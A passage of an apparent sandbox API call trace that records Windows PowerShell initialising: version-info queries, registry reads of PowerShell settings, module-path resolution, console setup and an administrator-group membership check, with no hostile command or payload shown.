0x322030 [0054.857] lstrcpyW (in: lpString1=0x322030, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0054.857] CoTaskMemFree (pv=0x322030) [0054.857] VerQueryValueW (in: pBlock=0x2c2b550, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0xcde78, puLen=0xcde70 | out: lplpBuffer=0xcde78*=0x2c2b644, puLen=0xcde70) returned 1 [0054.857] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49 [0054.857] CoTaskMemAlloc (cb=0x66) returned 0x317070 [0054.857] lstrcpyW (in: lpString1=0x317070, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly" [0054.858] CoTaskMemFree (pv=0x317070) [0054.858] VerQueryValueW (in: pBlock=0x2c2b550, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0xcde78, puLen=0xcde70 | out: lplpBuffer=0xcde78*=0x0, puLen=0xcde70) returned 0 [0054.858] VerQueryValueW (in: pBlock=0x2c2b550, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0xcde78, puLen=0xcde70 | out: lplpBuffer=0xcde78*=0x0, puLen=0xcde70) returned 0 [0054.858] VerQueryValueW (in: pBlock=0x2c2b550, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0xcde78, puLen=0xcde70 | out: lplpBuffer=0xcde78*=0x0, puLen=0xcde70) returned 0 [0054.858] VerQueryValueW (in: pBlock=0x2c2b550, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xcde48, puLen=0xcde40 | out: lplpBuffer=0xcde48*=0x2c2b5ec, puLen=0xcde40) returned 1 [0054.858] CoTaskMemAlloc (cb=0x204) returned 0x2dc380 [0054.858] VerLanguageNameW (in: wLang=0x0, szLang=0x2dc380, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10 [0054.858] CoTaskMemFree (pv=0x2dc380) [0054.858] VerQueryValueW (in: pBlock=0x2c2b550, lpSubBlock="\\", lplpBuffer=0xcde98, puLen=0xcde90 | out: lplpBuffer=0xcde98*=0x2c2b578, puLen=0xcde90) returned 1 [0054.867] CoTaskMemAlloc (cb=0x104) returned 0x32a5c0 [0054.867] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x32a5c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0054.867] CoTaskMemFree (pv=0x32a5c0) [0054.871] CoTaskMemAlloc (cb=0x104) returned 0x32a5c0 [0054.871] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x32a5c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0054.871] CoTaskMemFree (pv=0x32a5c0) [0054.874] lstrlenW (lpString="䅁") returned 1 [0054.882] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcdd68 | out: phkResult=0xcdd68*=0x308) returned 0x0 [0054.884] RegOpenKeyExW (in: hKey=0x308, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0xcdd58 | out: phkResult=0xcdd58*=0x30c) returned 0x0 [0054.884] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcdde8 | out: phkResult=0xcdde8*=0x310) returned 0x0 [0054.887] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcdd2c, lpData=0x0, lpcbData=0xcdd28*=0x0 | out: lpType=0xcdd2c*=0x1, lpData=0x0, lpcbData=0xcdd28*=0x56) returned 0x0 [0054.888] CoTaskMemAlloc (cb=0x5a) returned 0x317000 [0054.888] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcdcfc, lpData=0x317000, lpcbData=0xcdcf8*=0x56 | out: lpType=0xcdcfc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcdcf8*=0x56) returned 0x0 [0054.888] CoTaskMemFree (pv=0x317000) [0054.892] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.895] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.899] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.919] CoTaskMemAlloc (cb=0x104) returned 0x32a5c0 [0054.919] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x32a5c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0054.919] CoTaskMemFree (pv=0x32a5c0) [0055.132] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xcd920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0055.133] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xcd920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0055.199] CoTaskMemAlloc (cb=0x104) returned 0x32a6d0 [0055.199] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x32a6d0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0055.199] CoTaskMemFree (pv=0x32a6d0) [0055.200] CoTaskMemAlloc (cb=0x104) returned 0x32a6d0 [0055.200] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x32a6d0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0055.200] CoTaskMemFree (pv=0x32a6d0) [0055.224] CoTaskMemAlloc (cb=0x104) returned 0x32a6d0 [0055.224] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x32a6d0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0055.224] CoTaskMemFree (pv=0x32a6d0) [0055.224] CoTaskMemAlloc (cb=0x104) returned 0x32a6d0 [0055.224] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x32a6d0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0055.225] CoTaskMemFree (pv=0x32a6d0) [0055.225] CoTaskMemFree (pv=0x32a6d0) [0055.323] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xcd920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0055.323] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xcd920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0055.337] CoTaskMemAlloc (cb=0x104) returned 0x32a6d0 [0055.337] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x32a6d0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0055.337] CoTaskMemFree (pv=0x32a6d0) [0055.339] CoTaskMemAlloc (cb=0x104) returned 0x32a6d0 [0055.339] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x32a6d0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0055.339] CoTaskMemFree (pv=0x32a6d0) [0055.374] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.374] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.611] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xcd920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0055.611] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xcd920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0055.835] CoTaskMemAlloc (cb=0x104) returned 0x32a8f0 [0055.835] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x32a8f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0055.859] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0xcda40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c [0055.859] SetErrorMode (uMode=0x1) returned 0x1 [0055.859] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0xcdcc0 | out: lpFileInformation=0xcdcc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0055.859] SetErrorMode (uMode=0x1) returned 0x1 [0055.965] CoTaskMemAlloc (cb=0x104) returned 0x32a8f0 [0055.965] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x32a8f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0055.967] CoTaskMemAlloc (cb=0x104) returned 0x32a8f0 [0055.967] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x32a8f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0055.968] CoCreateGuid (in: pguid=0xce088 | out: pguid=0xce088*(Data1=0xb03407df, Data2=0x7f55, Data3=0x47d1, Data4=([0]=0x96, [1]=0x28, [2]=0xfc, [3]=0xea, [4]=0x2, [5]=0xcf, [6]=0x9e, [7]=0x68))) returned 0x0 [0055.970] CoTaskMemAlloc (cb=0x104) returned 0x32a8f0 [0055.970] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x32a8f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0055.970] CoTaskMemFree (pv=0x32a8f0) [0055.972] CoTaskMemAlloc (cb=0x104) returned 0x32a8f0 [0055.972] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x32a8f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0055.972] CoTaskMemFree (pv=0x32a8f0) [0055.974] CoTaskMemAlloc (cb=0x104) returned 0x32a8f0 [0055.974] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x32a8f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0055.974] CoTaskMemFree (pv=0x32a8f0) [0055.979] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf [0055.980] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0xcdd30 | out: lpConsoleScreenBufferInfo=0xcdd30) returned 1 [0055.984] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13 [0055.985] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0xcdd30 | out: lpConsoleScreenBufferInfo=0xcdd30) returned 1 [0055.988] GetCurrentProcess () returned 0xffffffffffffffff [0055.989] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xcdd58 | out: TokenHandle=0xcdd58*=0x324) returned 1 [0055.991] GetTokenInformation (in: TokenHandle=0x324, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xcdc78 | out: TokenInformation=0x0, ReturnLength=0xcdc78) returned 0 [0055.992] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x283f90 [0055.992] GetTokenInformation (in: TokenHandle=0x324, TokenInformationClass=0x8, TokenInformation=0x283f90, TokenInformationLength=0x4, ReturnLength=0xcdc78 | out: TokenInformation=0x283f90, ReturnLength=0xcdc78) returned 1 [0055.994] DuplicateTokenEx (in: hExistingToken=0x324, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0xcddd8 | out: phNewToken=0xcddd8*=0x320) returned 1 [0055.994] GetTokenInformation (in: TokenHandle=0x324, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xcdc78 | out: TokenInformation=0x0, ReturnLength=0xcdc78) returned 0 [0055.994] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x284100 [0055.994] GetTokenInformation (in: TokenHandle=0x324, TokenInformationClass=0x8, TokenInformation=0x284100, TokenInformationLength=0x4, ReturnLength=0xcdc78 | out: TokenInformation=0x284100, ReturnLength=0xcdc78) returned 1 [0055.995] CheckTokenMembership (in: TokenHandle=0x320, SidToCheck=0x2d062f8*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0xcdde8 | out: IsMember=0xcdde8) returned 1 [0055.995] CloseHandle (hObject=0x320) returned 1 [0055.995] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0055.995] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0055.996] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0055.996] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0056.053] CoTaskMemAlloc (cb=0x104) returned 0x32a8f0 [0056.053] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x32a8f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0056.055] WinSqmIsOptedIn () returned 0x0 [0056.055] CoTaskMemAlloc (cb=0x104) returned 0x32a8f0 [0056.055] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x32a8f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0056.056] CoTaskMemAlloc (cb=0x104) returned 0x32a8f0 [0056.056] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x32a8f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0056.057] CoTaskMemAlloc (cb=0x104) returned 0x32a8f0 [0056.057] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x32a8f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0056.057] CoTaskMemAlloc (cb=0x104) returned 0x32a8f0 [0056.057] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x32a8f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0056.058] CoTaskMemAlloc (cb=0x104) returned 0x32a8f0 [0056.058] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x32a8f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0056.058] CoTaskMemAlloc (cb=0x104) returned 0x32a8f0 [0056.058] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x32a8f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0056.059] CoTaskMemAlloc (cb=0x104) returned 0x32a8f0 [0056.059] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x32a8f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0056.059] CoTaskMemAlloc (cb=0x104) returned 0x32a8f0 [0056.059] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x32a8f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0056.062] CoTaskMemAlloc (cb=0x104) returned 0x32a8f0 [0056.062] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x32a8f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0056.062] CoTaskMemAlloc (cb=0x104) returned 0x32a8f0 [0056.062] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x32a8f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0056.186] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0056.186] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0056.187] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0056.187] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0056.187] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0056.187] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0056.188] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0056.188] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0056.188] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0056.188] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0056.188] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0056.188] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0056.190] CoTaskMemAlloc (cb=0x104) returned 0x32a8f0 [0056.190] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x32a8f0, nSize=0x80 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x69 [0056.191] CoTaskMemFree (pv=0x32a8f0) [0056.192] CoTaskMemAlloc (cb=0xcc) returned 0x31a890 [0056.192] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x31a890, nSize=0x64 | out: lpDst="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Mo ") returned 0x6a [0056.192] CoTaskMemFree (pv=0x31a890) [0056.192] CoTaskMemAlloc (cb=0xd8) returned 0x31a890 [0056.192] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x31a890, nSize=0x6a | out: lpDst="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x6a [0056.192] CoTaskMemFree (pv=0x31a890) [0056.192] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0xcda48 | out: phkResult=0xcda48*=0x328) returned 0x0 [0056.192] RegQueryValueExW (in: hKey=0x328, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xcd9cc, lpData=0x0, lpcbData=0xcd9c8*=0x0 | out: lpType=0xcd9cc*=0x2, lpData=0x0, lpcbData=0xcd9c8*=0x6c) returned 0x0 [0056.192] CoTaskMemAlloc (cb=0x70) returned 0x2cc040 [0056.192] RegQueryValueExW (in: hKey=0x328, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xcd99c, lpData=0x2cc040, lpcbData=0xcd998*=0x6c | out: lpType=0xcd99c*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0xcd998*=0x6c) returned 0x0 [0056.192] CoTaskMemFree (pv=0x2cc040) [0056.192] CoTaskMemAlloc (cb=0xcc) returned 0x31a890 [0056.192] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x31a890, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb [0056.192] CoTaskMemFree 